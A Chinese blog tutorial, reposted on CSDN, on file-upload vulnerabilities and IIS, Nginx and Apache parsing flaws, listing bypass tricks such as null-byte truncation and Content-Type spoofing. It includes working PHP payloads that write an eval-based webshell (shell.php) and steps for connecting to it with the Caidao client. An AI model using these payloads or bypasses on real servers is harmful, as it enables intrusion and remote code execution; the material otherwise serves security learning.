文件上传+解析漏洞

最新推荐文章于 2024-07-07 06:31:23 发布
最新推荐文章于 2024-07-07 06:31:23 发布
阅读量189 收藏
点赞数
文章标签: php 运维 shell
原文链接:http://www.cnblogs.com/xiaoqiyue/p/10144312.html
版权

原理:文件上传漏洞是指在需要上传文件的地方没有对上传的文件的格式进行过滤限制,从而导致恶意用户上传恶意文件,getshell。

防御:设置白名单,对用户上传的文件进行过滤限制

常用攻击方法

1.结合服务器解析漏洞上传恶意文件(最后总结了一下常见服务器解析漏洞,不全,欢迎大家随时来补充)

2.利用图片马绕过对文件内容检测的防御方法:检测文件内容的时候,是根据文件开头是否有GIF89A这些,以此来判断是否是图片

3.绕过前端验证

4.修改Content-Type绕过上传恶意文件

5.空字节代码绕过漏洞,也叫神奇的00截断,此处的00指的是16进制的00

文件名00截断实现过程:

1)第一种方法:上传文件名为1.php.jpg格式的图马文件,抓包后,在php后面加上一个空格字符,然后到hex中将php后面的空格字符对应的20改为00后放行即可。

2)第二种方法:上传文件名为1.php%00.jpg格式的图马文件,抓包后,将%00进行url解码后放行即可。

请求包中包含上传目录的,可以尝试对上传目录进行00截断,原理都一样,话不多说,直接上实现过程,,,,

实现过程:上传路径/upload/,直接改成/upload/%00,再将%00进行url解码后放行即可

6.一句话各种绕过的一个网址:https://blog.csdn.net/jaivy/article/details/77611738

下面是一个简单的文件上传webshell的实例:

可以看到该页面让上传一个文件,我们就上传一句话,然后抓包看看结果是什么

可以看到它不让我们上传这个文件,但是并没有提示我们应该上传什么类型的文件,猜测应该是黑名单过滤,我们把文件后缀名改成php3试一下

 

成功上传,接下来就可以去网页上看看我们上传的文件有没有被解析了

 

欧克,成功,最后就只需要连接菜刀就可以了

 解析漏洞:

一、IIS 5.x/6.0解析漏洞利用方法有两种

1.目录解析

/xx.asp/xx.jpg

漏洞原理:在网站下建立名字为 xx.asp的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。(php的也是一样)

漏洞利用:

 例如创建目录 images.php,那么如果把这个写有一句话木马的1.jpg文件上传进images.php这个目录下面,那么http://127.0.0.1/images.php/1.jpg 这个就是一个后门地址,可以直接用菜刀去连接

2.文件解析

xx.asp;.jpg (分号截断)

漏洞原理:在IIS6.0下的服务器默认不解析“;”后面的内容,也就是说xx.asp;.jpg会被服务器看成是xx.asp,解析成了asp文件

漏洞利用:上传一个写有一句话的1.asp;.jpg木马文件就可以直接用菜刀连接了(或者直接上传一个大马也可以直接访问了)

IIS6.0 默认的可执行文件除了asp还包含这三种

/xx.asa

/xx.cer

/xx.cdx

二、IIS 7.x/ Nginx <8.03解析漏洞

Nginx漏洞原理:
Nginx默认是以CGI的方式支持PHP解析的(即默认Fast-CGI为开启状态),普遍的做法是:上传一个名字为1.jpg,内容为:

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

的文件(其实就是利用了fputs这个函数),然后访问1.jpg/.php,在这个目录下就会生成一句话木马 shell.php

·IIS7.5解析漏洞

IIS7.5的漏洞与nginx的类似,都是由于php配置文件中,开启了cgi.fix_pathinfo,而这并不是nginx或者iis7.5本身的漏洞。

 三、Nginx <8.03 空字节代码执行漏洞

漏洞原理:Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码

影响版本:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

四、利用apache解析漏洞绕过服务器端扩展名检测:

漏洞原理:Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断. 这种漏洞存在于使用module模式与php结合的所有版本的Apache。

利用方法:将木马命名为 【1.php.adc】,在连接菜刀时,应该是http://.../1.php

五,IIS7.0,7.5和Nginx<8.03畸形解析漏洞(写webshell漏洞)

原理:在上传文件所在目录下创建一个一句话木马文件

实现过程:新建一个1.txt文件,内容为:

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[test])?>')?>

将文件保存成1.jpg格式,上传到服务器,假设上传路径为/upload,

上传成功后,直接访问/upload/1.jpg,然后我们会发现/upload目录下创建了一个一句话木马文件shell.php

 

转载于:https://www.cnblogs.com/xiaoqiyue/p/10144312.html

weixin_30673715
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpcmsv9.0任意文件上传漏洞解析
01-19
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:...
Apache文件解析漏洞
@小张小张的博客
10-19 2769
Apache解析漏洞 风险级别:高风险 风险描述:Apache解析文件时当遇到无法识别的扩展名时,将会从后向前解析,直到遇到识别的扩展名为止 风险分析:在控制上传文件时,判断文件名是否是PHP、ASP、ASPX、ASA、CER、ASPX等脚本扩展名,如果是,则不允许上传,防止攻击者上传1.php.rar等扩展名来绕过程序检测,配合解析漏洞,得到webshell解析漏洞主要存在于三大WEB服务程序,分别是IIS、NGINX和Apache。 IIS6.0下主要是有两个解析漏洞,一个是目录解析,如/x
文件上传漏洞原理和利用
VictorZhang
08-06 3491
文件上传 1.前段选择文件,提交文件 2.浏览器形成POST MultiPart报文发送到服务器 3.服务器中间件接收到报文,解析后交给后端代码进行处理 4.后端代码将上传的文件内容写入到临时文件中(PHP特有) 5.写入到文件中,文件名为提交的文件名或以一定规则生成的文件名 文件上传漏洞 1.未对上传文件进行严格的验证和过滤时,容易造成动态文件asp/php/jsp等等 2.如果上传的目标目录没...
apache解析漏洞上传shell
A_dmin的博客
09-15 2145
apache解析漏洞上传shell 实验概述   Apache HTTP Server(简称 Apache) 是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中;本实验通过对apache服务器的测试,判断是否存在...
apache 文件上传 (CVE-2017-15715)漏洞复现
weixin_42675091的博客
09-02 1973
apache 文件上传 (CVE-2017-15715)漏洞复现
文件上传
土拨鼠挖洞中的博客
10-04 642
文件上传绕过     常见限制绕过    白名单:     00截断绕过 %00截断:url中%00后面的内容会被注释,一般用于URL中修改文件名 0x00截断:0x00代表空字符,截断注释后面内容 MIME限制改类型: 绕过Content-Type检测文件类型上传 当浏览器在上传文件到服务器端的时候,服务器对上传的文件Content-Type类型进行检测,如果是白名单允许的,...
Apache文件解析漏洞-01
09-15
Apache文件解析漏洞利用场景非常广泛,例如在Web程序中存在文件上传功能,但是有黑名单验证时,攻击者可以通过构造特殊的文件名来欺骗Apache服务器,上传恶意文件到目标服务器。例如,攻击者可以上传一个名为"1....
finecms-含有前台文件上传漏洞源码包.zip
01-04
《细解FineCMS前台文件上传漏洞及其源码分析》 FineCMS是一款常见的开源内容管理系统,以其易用性和灵活性深受开发者喜爱。然而,如同其他软件一样,FineCMS也存在潜在的安全问题,其中最为突出的就是前台文件上传...
IIS_6.0文件解析漏洞及解决办法
04-07
此外,该漏洞还可以与其他文件上传漏洞结合,通过抓包、改包、NC 提交等方式来获取网站的控制权。 在网站安全方面,需要对上传文件进行严格的检查和过滤,限制上传目录的脚本执行权限,并制定策略来控制.asp 等目录...
解析漏洞源码
02-28
在网络安全领域,解析漏洞是一种常见的安全问题,尤其在网站开发中。这种漏洞通常是由于服务器或应用程序在处理文件上传时,对文件类型或内容的解析方式存在缺陷,导致攻击者能够绕过安全防护,上传恶意代码或者执行...
实战某大型连锁企业域渗透
Ms08067安全实验室
07-04 1038
点击星标,即时接收最新推文本文选自《内网安全攻防:红队之路》扫描二维码五折购书实战域渗透测试流程对黑客来说,拿下域控制器是终极目标。然而攻击者空间是如何通过采取信息收集、权限提升、横向移动等一系列手段,从而一步步拿下域控制器的呢?本次将从一张拓扑图开始,和大家一起梳理域的相关知识,并串联内网的各类攻击技术。实验环境概述 下图是一张某公司(虚构名:北京test公司)的网络拓扑示意图。该公司员工...
如何用Java写一个整理Java方法调用关系网络的程序
qq_42349895的博客
07-06 872
最近遇到了一个问题,大致是这样的:如果给你一个 java 方法,如何找到有哪些菜单在使用。我的第一想法是,这不很简单吗?!使用 IDEA 自带的右键 Find Usage 功能,一步一步往上溯源最终找到 Controller 中的方法,找到 requestMapping 的映射路径,然后去数据库一查便知。
php header函数使用无效怎么解决
滴水石穿
07-03 264
如果使用PHP header函数时发生无效的情况,可能有几种可能的原因和解决方法: 1、确保在调用header函数之前没有输出任何内容。header函数必须在任何输出之前调用,包括HTML标记、空格、换行符等。 2、确保没有使用BOM(Byte Order Mark)标记。BOM是一种在UTF-8编码中用于标识文件开头的特殊字符序列,它会导致header函数无效。可以使用文本编辑器将文件另存为UTF-8无BOM格式。 注意:在某些情况下,BOM会导致PHP session无法正常工作,因为session数据
wordpress网站添加一个临时维护功能
最新发布
爱酷码的博客
07-07 277
有时遇到一些情况,比如站点需要闭站备案、或者被要求停站等等,我们就可以使用本文的功能,使我们的 wordpress 站点一键进入站点维护模式:打开站点的任意链接都显示“站点维护中”的字眼,而且返回 503 响应码比整站关闭对搜索引擎更加友好~把以下代码放到functions.php文件中,主要用网站临时维护或者用于备案。事情做好了,把以下代码删除即可!
红日靶场----(二)1.信息收集
zhouA0221的博客
07-04 1392
上期靶场环境已经搭建完成,接下来我们开始渗透测试!主要是学习内网安全、内网横向移动、域渗透。
CVE-2023-30212(xss漏洞
Battery的博客
07-04 2793
OURPHP版本
GDP播放器 驱动视频播放器 PHP 系统源码 v4.4.3
荻酷网的博客
07-04 666
最重要的是我们自己开发了源代码,因此无论您在使用此工具时遇到什么问题,我们都会快速解决。分别支持PHP7.4/8.1/8.2三个版本。
Laravel文件存储:云端数据管理的艺术
2401_85842555的博客
07-06 502
Laravel的文件存储系统提供了一个统一的API,用于处理文件和目录的存取。
Redis基础教程(十四):Redis连接
菜鸟小码的博客
07-05 910
高效管理Redis连接是构建高性能、高并发应用系统的关键。通过使用连接池、设置合理的超时与重试策略,以及在多线程或多进程中正确管理连接,可以显著提高系统的响应速度和稳定性。在实际项目中,开发者应该根据具体的需求和场景,灵活运用这些策略,以实现最优的Redis连接管理。
nginx 上传文件漏洞_1.2 文件上传解析漏洞
05-15
然而,Nginx上传模块存在一个解析漏洞,即攻击者可以通过构造特定的上传请求,在服务器上执行任意代码。这种漏洞的成因是上传模块在解析上传请求时没有对上传文件的内容进行充分的检查和过滤,导致攻击者可以在上传...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值